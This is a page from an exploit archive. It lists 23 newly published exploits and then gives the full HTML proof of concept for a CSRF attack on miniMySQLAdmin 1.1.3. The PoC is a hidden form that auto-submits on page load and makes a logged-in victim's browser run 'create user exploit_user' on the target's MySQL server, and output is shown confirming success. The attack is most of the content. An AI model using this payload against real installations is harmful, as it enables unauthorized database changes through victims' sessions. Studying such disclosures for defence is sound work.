
23 new exploits Poison Ivy 2.1.x C2 Buffer Overflow (msf) Matrix42 Remote Control Host 3.20.0031 - Unquoted Path Privilege Escalation Dell OpenManage Server Administrator 8.3 - XML External Entity Exploit Mobiketa 1.0 - CSRF Add Admin Exploit miniMySQLAdmin 1.1.3 - CSRF Execute SQL Query phpMyFAQ 2.9.0 - Stored XSS Windows x86 system(_systeminfo_) Shellcode Armadito Antimalware - Backdoor/Bypass Riot Games League of Legends - Insecure File Permissions Privilege Escalation IPFire proxy.cgi RCE IPFire Bash Environment Variable Injection (Shellshock) Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution OS X Kernel - Exploitable NULL Pointer Dereference in nvCommandQueue::GetHandleIndex in GeForce.kext Android - /system/bin/sdcard Stack Buffer Overflow OS X Kernel - Exploitable NULL Pointer Dereference in AppleMuxControl.kext OS X Kernel - Exploitable NULL Pointer Dereference in AppleGraphicsDeviceControl OS X Kernel - Exploitable NULL Dereference in IOAccelSharedUserClient2::page_off_resource OS X Kernel - Exploitable NULL Dereference in CoreCaptureResponder Due to Unchecked Return Value OS X Kernel - Exploitable NULL Pointer Dereference in IOAudioEngine OS X Kernel - OOB Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type OS X Kernel - Use-After-Free Due to Bad Locking in IOAcceleratorFamily2 OS X/iOS Kernel - UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient OS X Kernel - Stack Buffer Overflow in GeForce GPU Driver
31 lines
902 B
HTML
Executable file
31 lines
902 B
HTML
Executable file
<!--
|
|
# Exploit Title: miniMySQLAdmin 1.1.3 - CSRF(Execute SQL Query)
|
|
# Date: 2016-06-10
|
|
# Exploit Author: HaHwul
|
|
# Exploit Author Blog: www.hahwul.com
|
|
# Vendor Homepage: http://xdsoft.net/minimysqladmin.html
|
|
# Software Link: https://github.com/xdan/miniMySQLAdmin/archive/master.zip
|
|
# Version: v1.1.3
|
|
# Tested on: Debian [wheezy]
|
|
# CVE : none
|
|
-->
|
|
|
|
<hr>
|
|
<form name="csrf_poc" action="http://192.168.0.14/vul_test/target/miniMySQLAdmin/" method="GET">
|
|
<input type="hidden" name="dbname" value="mysql">
|
|
<input type="hidden" name="table" value="user">
|
|
<input type="hidden" name="sql" value="create user exploit_user"> <!-- SQL Query -->
|
|
|
|
<input type="submit" value="Replay!">
|
|
</form>
|
|
<script type="text/javascript">document.forms.csrf_poc.submit();</script>
|
|
|
|
<!--
|
|
#### Output ####
|
|
|
|
#> select * from `user` order by `User` asc limit 20
|
|
|
|
Host User
|
|
% exploit_user1
|
|
|
|
-->
|